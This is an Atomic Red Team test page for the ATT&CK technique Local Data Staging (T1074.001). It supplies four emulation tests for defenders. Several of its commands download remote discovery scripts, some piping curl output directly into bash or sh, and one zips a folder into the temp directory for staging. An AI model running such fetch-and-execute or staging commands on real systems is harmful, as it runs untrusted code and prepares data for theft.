T1074.001
Data Staged: Local Data Staging
Description from ATT&CK
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
Atomic Tests
Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.
Supported Platforms: windows
auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Location to save downloaded discovery.bat file | path | $env:TEMP\discovery.bat |
Attack Commands: Run with powershell!
1
2
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}
Cleanup Commands:
1
2
Remove-Item -Force #{output_file} -ErrorAction Ignore
Atomic Test #2 - Stage data from Discovery.sh
Utilize curl to download discovery.sh and execute a basic information gathering shell script
Supported Platforms: linux,macos
auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Location to save downloaded discovery.bat file | path | /tmp/T1074.001_discovery.log |
Attack Commands: Run with bash!
1
2
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}
Atomic Test #3 - Stage data from Discovery.sh (freebsd)
Utilize curl to download discovery.sh and execute a basic information gathering shell script
Supported Platforms: freebsd
auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Location to save downloaded discovery.bat file | path | /tmp/T1074.001_discovery.log |
Attack Commands: Run with sh!
1
2
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
Dependencies: Run with sh!
Description: Check if curl is installed.
Check Prereq Commands:
1
2
if [ ! -x "$(command -v curl)" ]; then exit 1; else exit 0; fi;
Get Prereq Commands:
1
2
(which pkg && pkg install -y curl)
Atomic Test #4 - Zip a Folder with PowerShell for Staging in Temp
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.
Supported Platforms: windows
auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Location to save zipped file or folder | path | $env:TEMP\Folder_to_zip.zip |
| input_file | Location of file or folder to zip | path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip |
Attack Commands: Run with powershell!
1
2
Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force
Cleanup Commands:
1
2
Remove-Item -Path #{output_file} -ErrorAction Ignore